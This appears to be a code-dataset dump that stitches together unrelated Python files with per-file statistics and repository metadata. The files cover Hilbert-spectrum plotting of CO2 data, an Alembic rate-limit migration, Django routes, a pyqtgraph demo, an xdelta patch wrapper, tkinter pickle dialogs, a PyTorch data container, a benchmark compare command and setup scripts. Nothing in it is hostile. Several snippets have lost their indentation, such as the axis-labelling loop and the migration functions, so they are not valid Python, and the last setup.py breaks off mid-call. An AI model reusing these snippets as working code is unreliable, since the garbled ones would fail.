factor = 1.0
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
ax.pcolormesh(x, y, np.abs(z), cmap='gist_rainbow', vmin=z_min, vmax=z_max)
plt.plot(t[:-1], 0.124 * np.ones_like(t[:-1]), '--', label=textwrap.fill('Hamiltonian frequency approximation', 15))
plt.plot(t[:-1], 0.04 * np.ones_like(t[:-1]), 'g--', label=textwrap.fill('Driving function frequency', 15))
plt.xticks([0, 50, 100, 150])
plt.yticks([0, 0.1, 0.2])
plt.ylabel('Frequency (Hz)')
plt.xlabel('Time (s)')
box_0 = ax.get_position()
ax.set_position([box_0.x0, box_0.y0 + 0.05, box_0.width * 0.75, box_0.height * 0.9])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/Duffing_equation_ht.png')
plt.show()
# Carbon Dioxide Concentration Example
CO2_data = pd.read_csv('Data/co2_mm_mlo.csv', header=51)
plt.plot(CO2_data['month'], CO2_data['decimal date'])
plt.title(textwrap.fill('Mean Monthly Concentration of Carbon Dioxide in the Atmosphere', 35))
plt.ylabel('Parts per million')
plt.xlabel('Time (years)')
plt.savefig('jss_figures/CO2_concentration.png')
plt.show()
signal = CO2_data['decimal date']
signal = np.asarray(signal)
time = CO2_data['month']
time = np.asarray(time)
# compare other packages Carbon Dioxide - top
pyemd = pyemd0215()
py_emd = pyemd(signal)
IP, IF, IA = emd040.spectra.frequency_transform(py_emd[:2, :].T, 12, 'hilbert')
print(f'PyEMD annual frequency error: {np.round(sum(np.abs(IF[:, 0] - np.ones_like(IF[:, 0]))), 3)}')
freq_edges, freq_bins = emd040.spectra.define_hist_bins(0, 2, 100)
hht = emd040.spectra.hilberthuang(IF, IA, freq_edges)
hht = gaussian_filter(hht, sigma=1)
fig, ax = plt.subplots()
figure_size = plt.gcf().get_size_inches()
factor = 0.8
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.title(textwrap.fill('Gaussian Filtered Hilbert Spectrum of CO$_{2}$ Concentration using PyEMD 0.2.10', 45))
plt.ylabel('Frequency (year$^{-1}$)')
plt.xlabel('Time (years)')
plt.pcolormesh(time, freq_bins, hht, cmap='gist_rainbow', vmin=0, vmax=np.abs(hht).max())
plt.plot(time, np.ones_like(time), 'k--', label=textwrap.fill('Annual cycle', 10))
box_0 = ax.get_position()
ax.set_position([box_0.x0 + 0.0125, box_0.y0 + 0.075, box_0.width * 0.8, box_0.height * 0.9])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/CO2_Hilbert_pyemd.png')
plt.show()
emd_sift = emd040.sift.sift(signal)
IP, IF, IA = emd040.spectra.frequency_transform(emd_sift[:, :1], 12, 'hilbert')
print(f'emd annual frequency error: {np.round(sum(np.abs(IF - np.ones_like(IF)))[0], 3)}')
freq_edges, freq_bins = emd040.spectra.define_hist_bins(0, 2, 100)
hht = emd040.spectra.hilberthuang(IF, IA, freq_edges)
hht = gaussian_filter(hht, sigma=1)
fig, ax = plt.subplots()
figure_size = plt.gcf().get_size_inches()
factor = 0.8
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.title(textwrap.fill('Gaussian Filtered Hilbert Spectrum of CO$_{2}$ Concentration using emd 0.3.3', 45))
plt.ylabel('Frequency (year$^{-1}$)')
plt.xlabel('Time (years)')
plt.pcolormesh(time, freq_bins, hht, cmap='gist_rainbow', vmin=0, vmax=np.abs(hht).max())
plt.plot(time, np.ones_like(time), 'k--', label=textwrap.fill('Annual cycle', 10))
box_0 = ax.get_position()
ax.set_position([box_0.x0 + 0.0125, box_0.y0 + 0.075, box_0.width * 0.8, box_0.height * 0.9])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/CO2_Hilbert_emd.png')
plt.show()
# compare other packages Carbon Dioxide - bottom
knots = np.linspace(time[0], time[-1], 200)
emd_example = AdvEMDpy.EMD(time=time, time_series=signal)
imfs, hts, ifs, _, _, _, _ = \
emd_example.empirical_mode_decomposition(knots=knots, knot_time=time, verbose=False)
print(f'AdvEMDpy annual frequency error: {np.round(sum(np.abs(ifs[1, :] / (2 * np.pi) - np.ones_like(ifs[1, :]))), 3)}')
fig, axs = plt.subplots(2, 2)
plt.subplots_adjust(hspace=0.5)
axs[0, 0].plot(time, signal)
axs[0, 1].plot(time, signal)
axs[0, 1].plot(time, imfs[0, :], label='Smoothed')
axs[0, 1].legend(loc='lower right')
axs[1, 0].plot(time, imfs[1, :])
axs[1, 1].plot(time, imfs[2, :])
axis = 0
for ax in axs.flat:
if axis == 0:
        ax.set(ylabel=r'CO$_2$ concentration')
if axis == 1:
pass
if axis == 2:
        ax.set(ylabel=r'CO$_2$ concentration')
ax.set(xlabel='Time (years)')
if axis == 3:
ax.set(xlabel='Time (years)')
axis += 1
plt.gcf().subplots_adjust(bottom=0.15)
axs[0, 0].set_title(r'Original CO$_2$ Concentration')
axs[0, 1].set_title('Smoothed CO$_2$ Concentration')
axs[1, 0].set_title('IMF 1')
axs[1, 1].set_title('Residual')
plt.savefig('jss_figures/CO2_EMD.png')
plt.show()
hs_outputs = hilbert_spectrum(time, imfs, hts, ifs, max_frequency=10, which_imfs=[1], plot=False)
x_hs, y, z = hs_outputs
y = y / (2 * np.pi)
z_min, z_max = 0, np.abs(z).max()
fig, ax = plt.subplots()
figure_size = plt.gcf().get_size_inches()
factor = 0.7
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
ax.pcolormesh(x_hs, y, np.abs(z), cmap='gist_rainbow', vmin=z_min, vmax=z_max)
ax.set_title(textwrap.fill(r'Gaussian Filtered Hilbert Spectrum of CO$_{2}$ Concentration using AdvEMDpy', 40))
plt.ylabel('Frequency (year$^{-1}$)')
plt.xlabel('Time (years)')
plt.plot(x_hs[0, :], np.ones_like(x_hs[0, :]), 'k--', label=textwrap.fill('Annual cycle', 10))
ax.axis([x_hs.min(), x_hs.max(), y.min(), y.max()])
box_0 = ax.get_position()
ax.set_position([box_0.x0 + 0.0125, box_0.y0 + 0.075, box_0.width * 0.8, box_0.height * 0.9])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/CO2_Hilbert.png')
plt.show()
| 48.949835 | 135 | 0.664141 | 12,802 | 74,159 | 3.621856 | 0.043196 | 0.016909 | 0.027498 | 0.012768 | 0.784416 | 0.728988 | 0.665711 | 0.613152 | 0.567192 | 0.53523 | 0 | 0.065736 | 0.149732 | 74,159 | 1,514 | 136 | 48.982166 | 0.66959 | 0.012662 | 0 | 0.425532 | 0 | 0.007092 | 0.114509 | 0.018518 | 0 | 0 | 0 | 0 | 0 | 1 | 0.000788 | false | 0.000788 | 0.016548 | 0 | 0.018125 | 0.007092 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6adeb529cfb4e14bdceab8619cd0e9f75dad5fb6
| 615 |
py
|
Python
|
migrations/versions/0158_remove_rate_limit_default.py
|
cds-snc/notifier-api
|
90b385ec49efbaee7e607516fc7d9f08991af813
|
[
"MIT"
] | 41 |
2019-11-28T16:58:41.000Z
|
2022-01-28T21:11:16.000Z
|
migrations/versions/0158_remove_rate_limit_default.py
|
cds-snc/notification-api
|
b1c1064f291eb860b494c3fa65ac256ad70bf47c
|
[
"MIT"
] | 1,083 |
2019-07-08T12:57:24.000Z
|
2022-03-08T18:53:40.000Z
|
migrations/versions/0158_remove_rate_limit_default.py
|
cds-snc/notifier-api
|
90b385ec49efbaee7e607516fc7d9f08991af813
|
[
"MIT"
] | 9 |
2020-01-24T19:56:43.000Z
|
2022-01-27T21:36:53.000Z
|
"""
Revision ID: 0158_remove_rate_limit_default
Revises: 0157_add_rate_limit_to_service
Create Date: 2018-01-09 14:33:08.313893
"""
import sqlalchemy as sa
from alembic import op
revision = "0158_remove_rate_limit_default"
down_revision = "0157_add_rate_limit_to_service"
def upgrade():
op.execute("ALTER TABLE services ALTER rate_limit DROP DEFAULT")
op.execute("ALTER TABLE services_history ALTER rate_limit DROP DEFAULT")
def downgrade():
op.execute("ALTER TABLE services ALTER rate_limit SET DEFAULT '3000'")
op.execute("ALTER TABLE services_history ALTER rate_limit SET DEFAULT '3000'")
| 26.73913 | 82 | 0.785366 | 93 | 615 | 4.924731 | 0.430108 | 0.157205 | 0.122271 | 0.165939 | 0.720524 | 0.558952 | 0.388646 | 0.388646 | 0.209607 | 0 | 0 | 0.082552 | 0.133333 | 615 | 22 | 83 | 27.954545 | 0.776735 | 0.2 | 0 | 0 | 0 | 0 | 0.59751 | 0.124481 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6ae016a3900fe6ed337451d458c99fc65e3be76f
| 888 |
py
|
Python
|
backend/core/api_urls.py
|
albeiks/omaralbeik.com
|
8d096130393919612863aac6280dffaf6e00961d
|
[
"MIT"
] | 10 |
2020-05-05T16:20:04.000Z
|
2021-07-22T15:15:13.000Z
|
backend/core/api_urls.py
|
albeiks/omaralbeik.com
|
8d096130393919612863aac6280dffaf6e00961d
|
[
"MIT"
] | null | null | null |
backend/core/api_urls.py
|
albeiks/omaralbeik.com
|
8d096130393919612863aac6280dffaf6e00961d
|
[
"MIT"
] | 1 |
2020-05-06T22:31:48.000Z
|
2020-05-06T22:31:48.000Z
|
from django.conf.urls import url, include
from core.routers import OptionalTrailingSlashRouter
from blog import views as blogViews
from snippets import views as snippetsViews
from projects import views as projectsViews
from tags import views as tagsViews
from contents import views as contentsViews
from contact import views as contactViews
router = OptionalTrailingSlashRouter()
router.register(r"blog", blogViews.PostViewSet)
router.register(r"snippets", snippetsViews.SnippetViewSet)
router.register(r"languages", snippetsViews.ProgrammingLanguageViewSet)
router.register(r"projects", projectsViews.ProjectViewSet)
router.register(r"tags", tagsViews.TagViewSet)
router.register(r"contents", contentsViews.ContentViewSet)
router.register(r"contact", contactViews.MessageViewSet)
# List or url patterns for the api subdomain
urlpatterns = [
url(r"^v2/", include(router.urls)),
]
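# The registered viewsets are exposed under the /v2/ prefix, e.g. /v2/blog/ and
# /v2/snippets/ (endpoint paths inferred from the register() calls above).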
| 35.52 | 71 | 0.824324 | 107 | 888 | 6.841122 | 0.411215 | 0.13388 | 0.143443 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001245 | 0.095721 | 888 | 24 | 72 | 37 | 0.910336 | 0.047297 | 0 | 0 | 0 | 0 | 0.061611 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.421053 | 0 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
0a77fdb1c15169709a632c8652ce9cffd62abd68
| 491 |
py
|
Python
|
jnpy/experiments/Qt/pyqtgraph_tutorial/codeloop_org_materials/c4_drawing_curves.py
|
jojoquant/jnpy
|
c874060af4b129ae09cee9f8542517b7b2f6573b
|
[
"MIT"
] | 5 |
2020-05-19T07:32:39.000Z
|
2022-03-14T09:09:48.000Z
|
jnpy/experiments/Qt/pyqtgraph_tutorial/codeloop_org_materials/c4_drawing_curves.py
|
jojoquant/jnpy
|
c874060af4b129ae09cee9f8542517b7b2f6573b
|
[
"MIT"
] | null | null | null |
jnpy/experiments/Qt/pyqtgraph_tutorial/codeloop_org_materials/c4_drawing_curves.py
|
jojoquant/jnpy
|
c874060af4b129ae09cee9f8542517b7b2f6573b
|
[
"MIT"
] | 3 |
2020-04-02T08:30:17.000Z
|
2020-05-03T12:12:05.000Z
|
# !/usr/bin/env python3
# -*- coding:utf-8 -*-
# @Datetime : 2019/11/14 上午2:26
# @Author : Fangyang
# @Software : PyCharm
import sys
from PyQt5.QtWidgets import QApplication
import pyqtgraph as pg
import numpy as np
app = QApplication(sys.argv)
x = np.arange(1000)
y = np.random.normal(size=(3, 1000))
plotWidget = pg.plot(title='Three plot curves')
for i in range(3):
plotWidget.plot(x, y[i], pen=(i, 3))
status = app.exec_()
sys.exit(status)
if __name__ == '__main__':
pass
| 19.64 | 47 | 0.678208 | 77 | 491 | 4.207792 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060976 | 0.164969 | 491 | 24 | 48 | 20.458333 | 0.729268 | 0.230143 | 0 | 0 | 0 | 0 | 0.067204 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.071429 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
0a7f1dd168a64e7f7f19d3324731c892ec275922
| 1,845 |
py
|
Python
|
patch.py
|
silverhikari/romtools
|
2a09290fef85f35502a95c5c2874317029f0439c
|
[
"Apache-2.0"
] | 5 |
2018-02-02T06:36:56.000Z
|
2020-12-21T20:17:20.000Z
|
patch.py
|
silverhikari/romtools
|
2a09290fef85f35502a95c5c2874317029f0439c
|
[
"Apache-2.0"
] | 8 |
2017-10-10T17:50:47.000Z
|
2021-06-02T00:02:58.000Z
|
patch.py
|
silverhikari/romtools
|
2a09290fef85f35502a95c5c2874317029f0439c
|
[
"Apache-2.0"
] | 2 |
2017-10-10T20:15:24.000Z
|
2021-12-17T04:50:16.000Z
|
"""
Utils for creating xdelta patches.
"""
import logging
from subprocess import check_output, CalledProcessError
from shutil import copyfile
from os import remove, path
class PatchChecksumError(Exception):
def __init__(self, message, errors):
        super(PatchChecksumError, self).__init__(message)
        self.errors = errors
class Patch:
# TODO: Abstract out the need for "edited" by just copying the original
# file.
def __init__(self, original, filename, edited=None, xdelta_dir='.'):
self.original = original
self.edited = edited
self.filename = filename
# Need to have this absolute path for xdelta3 to be found.
self.xdelta_path = path.join(xdelta_dir, 'xdelta3')
# self.xdelta_path = 'xdelta3'
def create(self):
if self.edited is None:
            raise Exception('Cannot create a patch without an edited file.')
cmd = [
self.xdelta_path,
'-f',
'-s',
self.original,
self.edited,
self.filename,
]
print(cmd)
logging.info(cmd)
try:
check_output(cmd)
except CalledProcessError as e:
raise Exception(e.output)
def apply(self):
if not self.edited:
copyfile(self.original, self.original + "_temp")
self.edited = self.original
self.original = self.original + "_temp"
cmd = [
self.xdelta_path,
'-f',
'-d',
'-s',
self.original,
self.filename,
self.edited,
]
logging.info(cmd)
try:
check_output(cmd)
except CalledProcessError:
raise PatchChecksumError('Target file had incorrect checksum', [])
finally:
if self.original.endswith('_temp'):
remove(self.original)
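# Minimal usage sketch (file names are hypothetical):
#   Patch('rom_original.bin', 'fix.xdelta', edited='rom_edited.bin').create()
#   Patch('rom_original.bin', 'fix.xdelta').apply()  # writes the patched result to the original path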
| 27.132353 | 78 | 0.564228 | 190 | 1,845 | 5.352632 | 0.378947 | 0.129794 | 0.078663 | 0.070796 | 0.198623 | 0.108161 | 0.108161 | 0.108161 | 0.108161 | 0 | 0 | 0.002479 | 0.344173 | 1,845 | 67 | 79 | 27.537313 | 0.838017 | 0.106775 | 0 | 0.384615 | 0 | 0 | 0.040929 | 0 | 0 | 0 | 0 | 0.014925 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.192308 | 0.019231 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0a8741dde6ef103d06812289a7da5d5ee4748c1d
| 2,427 |
py
|
Python
|
src/tkdialog/dialog.py
|
KosukeMizuno/tkdialog
|
082fc106908bbbfa819d1a129929165f11d4e944
|
[
"MIT"
] | null | null | null |
src/tkdialog/dialog.py
|
KosukeMizuno/tkdialog
|
082fc106908bbbfa819d1a129929165f11d4e944
|
[
"MIT"
] | null | null | null |
src/tkdialog/dialog.py
|
KosukeMizuno/tkdialog
|
082fc106908bbbfa819d1a129929165f11d4e944
|
[
"MIT"
] | null | null | null |
from pathlib import Path
import pickle
import tkinter as tk
import tkinter.filedialog
def open_dialog(**opt):
"""Parameters
----------
Options will be passed to `tkinter.filedialog.askopenfilename`.
See also tkinter's document.
    The following are examples of frequently used options.
- filetypes=[(label, ext), ...]
- label: str
      - ext: str, semicolon-separated extensions
- initialdir: str, default Path.cwd()
- multiple: bool, default False
Returns
--------
filename, str
"""
root = tk.Tk()
root.withdraw()
root.wm_attributes("-topmost", True)
opt_default = dict(initialdir=Path.cwd())
_opt = dict(opt_default, **opt)
return tk.filedialog.askopenfilename(**_opt)
def saveas_dialog(**opt):
"""Parameters
----------
Options will be passed to `tkinter.filedialog.asksaveasfilename`.
See also tkinter's document.
    The following are examples of frequently used options.
- filetypes=[(label, ext), ...]
- label: str
      - ext: str, semicolon-separated extensions
- initialdir: str, default Path.cwd()
    - initialfile: str, no default is set
Returns
--------
filename, str
"""
root = tk.Tk()
root.withdraw()
root.wm_attributes("-topmost", True)
opt_default = dict(initialdir=Path.cwd())
_opt = dict(opt_default, **opt)
return tk.filedialog.asksaveasfilename(**_opt)
def load_pickle_with_dialog(mode='rb', **opt):
"""Load a pickled object with a filename assigned by tkinter's open dialog.
    kwargs will be passed to open_dialog.
"""
opt_default = dict(filetypes=[('pickled data', '*.pkl'), ('all', '*')])
_opt = dict(opt_default, **opt)
fn = open_dialog(**_opt)
if fn == '': # canceled
return None
with Path(fn).open(mode) as f:
data = pickle.load(f)
return data
def dump_pickle_with_dialog(obj, mode='wb', **opt):
"""Pickle an object with a filename assigned by tkinter's saveas dialog.
kwargs will be passed to saveas_dialog.
Returns
--------
filename: str
"""
opt_default = dict(filetypes=[('pickled data', '*.pkl'), ('all', '*')])
_opt = dict(opt_default, **opt)
fn = saveas_dialog(**_opt)
if fn == '': # canceled
return ''
    # note: tkinter handles the overwrite confirmation dialog, so no check is needed here
with Path(fn).open(mode) as f:
pickle.dump(obj, f)
return fn
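# Usage sketch (opens native dialogs, so a display is required):
#   data = load_pickle_with_dialog()                       # returns None if cancelled
#   dump_pickle_with_dialog(data, initialfile='data.pkl')  # 'initialfile' is passed through to tkinter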
| 25.547368 | 79 | 0.622167 | 291 | 2,427 | 5.085911 | 0.285223 | 0.054054 | 0.032432 | 0.037838 | 0.713514 | 0.713514 | 0.677027 | 0.648649 | 0.547297 | 0.547297 | 0 | 0 | 0.23527 | 2,427 | 94 | 80 | 25.819149 | 0.797414 | 0.433045 | 0 | 0.5 | 0 | 0 | 0.050945 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0a89d9e3455e77e62d24b044c32fc90cbc464fc1
| 368 |
py
|
Python
|
setup.py
|
SilicalNZ/canvas
|
44d1eee02c334aae6b41aeba01ed0ecdf83aed21
|
[
"MIT"
] | 7 |
2019-08-04T20:37:55.000Z
|
2020-03-05T08:36:10.000Z
|
setup.py
|
SilicalNZ/canvas
|
44d1eee02c334aae6b41aeba01ed0ecdf83aed21
|
[
"MIT"
] | 1 |
2019-10-21T05:43:28.000Z
|
2019-10-21T05:43:28.000Z
|
setup.py
|
SilicalNZ/canvas
|
44d1eee02c334aae6b41aeba01ed0ecdf83aed21
|
[
"MIT"
] | null | null | null |
import setuptools
setuptools.setup(
name = 'sili-canvas',
version = '0.0.1',
license = 'MIT',
url = 'https://github.com/SilicalNZ/canvas',
description = 'A series of easy to use classes to perform complex 2D array transformations',
long_description = '',
author = 'SilicalNZ',
packages = ['canvas', 'canvas.common', 'canvas.tools']
)
| 26.285714 | 96 | 0.649457 | 43 | 368 | 5.534884 | 0.790698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013699 | 0.206522 | 368 | 13 | 97 | 28.307692 | 0.80137 | 0 | 0 | 0 | 0 | 0 | 0.459239 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0a8b4fc2b42148f674fa2146ee9800ea9e96f927
| 2,614 |
py
|
Python
|
surname_rnn/surname/containers.py
|
sudarshan85/nlpbook
|
41e59d706fb31f5185a0133789639ccffbddb41f
|
[
"Apache-2.0"
] | null | null | null |
surname_rnn/surname/containers.py
|
sudarshan85/nlpbook
|
41e59d706fb31f5185a0133789639ccffbddb41f
|
[
"Apache-2.0"
] | null | null | null |
surname_rnn/surname/containers.py
|
sudarshan85/nlpbook
|
41e59d706fb31f5185a0133789639ccffbddb41f
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import pandas as pd
from pathlib import Path
from torch.utils.data import DataLoader
class ModelContainer(object):
def __init__(self, model, optimizer, loss_fn, scheduler=None):
self.model = model
self.optimizer = optimizer
self.loss_fn = loss_fn
self.scheduler = scheduler
class DataContainer(object):
def __init__(self, df_with_split: pd.DataFrame, dataset_class, vectorizer_file: Path, batch_size:
int, with_test=True, is_load: bool=True) -> None:
self.train_df = df_with_split.loc[df_with_split['split'] == 'train']
self.val_df = df_with_split.loc[df_with_split['split'] == 'val']
self._bs = batch_size
self.with_test = with_test
self.is_load = is_load
self._lengths = {'train_size': len(self.train_df), 'val_size': len(self.val_df)}
self._n_batches = [self._lengths['train_size'] // self._bs, self._lengths['val_size'] //
self._bs]
if not self.is_load:
print("Creating and saving vectorizer")
train_ds = dataset_class.load_data_and_create_vectorizer(self.train_df)
train_ds.save_vectorizer(vectorizer_file)
self.train_ds = dataset_class.load_data_and_vectorizer_from_file(self.train_df, vectorizer_file)
self.vectorizer = self.train_ds.vectorizer
self.surname_vocab = self.vectorizer.surname_vocab
self.nationality_vocab = self.vectorizer.nationality_vocab
self.train_dl = DataLoader(self.train_ds, self._bs, shuffle=True, drop_last=True)
self.val_ds = dataset_class.load_data_and_vectorizer(self.val_df, self.vectorizer)
self.val_dl = DataLoader(self.val_ds, self._bs, shuffle=True, drop_last=True)
if self.with_test:
self.test_df = df_with_split.loc[df_with_split['split'] == 'test']
self._lengths['test_size'] = len(self.test_df)
self._n_batches.append(self._lengths['test_size'] // self._bs)
self.test_ds = dataset_class.load_data_and_vectorizer(self.test_df, self.vectorizer)
self.test_dl = DataLoader(self.test_ds, self._bs, shuffle=True, drop_last=True)
def get_loaders(self):
return self.train_dl, self.val_dl, self.test_dl
@property
def train_batches(self):
return self._n_batches[0]
@property
def val_batches(self):
return self._n_batches[1]
@property
def test_batches(self):
if not self.with_test:
raise NameError("No test dataset was provided")
return self._n_batches[2]
@property
def vocab_size(self):
return len(self.surname_vocab)
@property
def n_classes(self):
return len(self.nationality_vocab)
@property
def sizes(self):
return self._lengths
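# Usage sketch (the dataset class and DataFrame are assumptions for illustration):
#   dc = DataContainer(df, SurnameDataset, Path('vectorizer.json'), batch_size=64)
#   train_dl, val_dl, test_dl = dc.get_loaders()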
| 33.512821 | 100 | 0.729533 | 389 | 2,614 | 4.570694 | 0.210797 | 0.045557 | 0.043307 | 0.040495 | 0.22216 | 0.22216 | 0.189539 | 0.150169 | 0.053993 | 0 | 0 | 0.001366 | 0.159908 | 2,614 | 77 | 101 | 33.948052 | 0.808288 | 0.007651 | 0 | 0.101695 | 0 | 0 | 0.053627 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.152542 | false | 0 | 0.050847 | 0.101695 | 0.355932 | 0.016949 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 |
0
| 1 |
0a95cfa206f2acf8636e2a3399ef4362d43aa15a
| 3,092 |
py
|
Python
|
pybm/commands/compare.py
|
nicholasjng/pybm
|
13e256ca5c2c8239f9d611b9849dab92f70b2834
|
[
"Apache-2.0"
] | 12 |
2021-10-10T20:00:07.000Z
|
2022-02-09T11:29:07.000Z
|
pybm/commands/compare.py
|
nicholasjng/pybm
|
13e256ca5c2c8239f9d611b9849dab92f70b2834
|
[
"Apache-2.0"
] | 20 |
2021-10-13T09:37:20.000Z
|
2022-03-07T15:14:00.000Z
|
pybm/commands/compare.py
|
nicholasjng/pybm
|
13e256ca5c2c8239f9d611b9849dab92f70b2834
|
[
"Apache-2.0"
] | 1 |
2022-02-09T10:09:41.000Z
|
2022-02-09T10:09:41.000Z
|
from typing import List
from pybm import PybmConfig
from pybm.command import CLICommand
from pybm.config import get_reporter_class
from pybm.exceptions import PybmError
from pybm.reporters import BaseReporter
from pybm.status_codes import ERROR, SUCCESS
from pybm.util.path import get_subdirs
class CompareCommand(CLICommand):
"""
Report benchmark results from specified sources.
"""
usage = "pybm compare <run> <anchor-ref> <compare-refs> [<options>]\n"
def __init__(self):
super(CompareCommand, self).__init__(name="compare")
self.config = PybmConfig.load()
def add_arguments(self):
self.parser.add_argument(
"run",
type=str,
metavar="<run>",
help="Benchmark run to report results for. "
"To report the preceding run, use the "
'"latest" keyword. To report results '
"of the n-th preceding run "
"(i.e., n runs ago), "
'use the "latest^{n}" syntax.',
)
self.parser.add_argument(
"refs",
nargs="+",
metavar="<refs>",
help="Benchmarked refs to compare. The first "
"given ref will be treated as the "
"anchor ref, relative to which all "
"differences are reported. An error is "
"raised if any of the given "
"refs are not present in the run.",
)
reporter: BaseReporter = get_reporter_class(config=self.config)
reporter_args = reporter.additional_arguments()
if reporter_args:
reporter_name = self.config.get_value("reporter.name")
reporter_group_desc = (
f"Additional options from configured reporter class {reporter_name!r}"
)
reporter_group = self.parser.add_argument_group(reporter_group_desc)
# add builder-specific options into the group
for arg in reporter_args:
reporter_group.add_argument(arg.pop("flags"), **arg)
def run(self, args: List[str]) -> int:
if not args:
self.parser.print_help()
return ERROR
self.add_arguments()
options = self.parser.parse_args(args)
reporter: BaseReporter = get_reporter_class(config=self.config)
# TODO: Parse run to fit schema
run = options.run
refs: List[str] = options.refs
result_dir = reporter.result_dir
# TODO: Make this dynamic to support other run identifiers
result = sorted(get_subdirs(result_dir))[-1]
result_path = result_dir / result
if result_path.exists():
reporter.compare(
*refs,
result=result,
target_filter=options.target_filter,
benchmark_filter=options.benchmark_filter,
context_filter=options.context_filter,
)
else:
raise PybmError(
f"No benchmark results found for the requested run {run!r}."
)
return SUCCESS
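# Example invocation matching the usage string above (run name and refs are placeholders):
#   pybm compare latest main feature-branch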
| 32.893617 | 86 | 0.597025 | 351 | 3,092 | 5.11396 | 0.361823 | 0.031198 | 0.026741 | 0.035097 | 0.057939 | 0.057939 | 0.057939 | 0.057939 | 0 | 0 | 0 | 0.000474 | 0.317917 | 3,092 | 93 | 87 | 33.247312 | 0.85064 | 0.058215 | 0 | 0.056338 | 0 | 0 | 0.212509 | 0 | 0 | 0 | 0 | 0.010753 | 0 | 1 | 0.042254 | false | 0 | 0.112676 | 0 | 0.211268 | 0.014085 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0a96a8a9570ed3b24a4bfee94944da9262d1bde3
| 449 |
py
|
Python
|
setup.py
|
nopipifish/bert4keras
|
d8fd065b9b74b8a82b381b7183f9934422e4caa9
|
[
"Apache-2.0"
] | 1 |
2020-09-09T02:34:28.000Z
|
2020-09-09T02:34:28.000Z
|
setup.py
|
nopipifish/bert4keras
|
d8fd065b9b74b8a82b381b7183f9934422e4caa9
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
nopipifish/bert4keras
|
d8fd065b9b74b8a82b381b7183f9934422e4caa9
|
[
"Apache-2.0"
] | null | null | null |
#! -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(
name='bert4keras',
version='0.8.4',
description='an elegant bert4keras',
long_description='bert4keras: https://github.com/bojone/bert4keras',
license='Apache License 2.0',
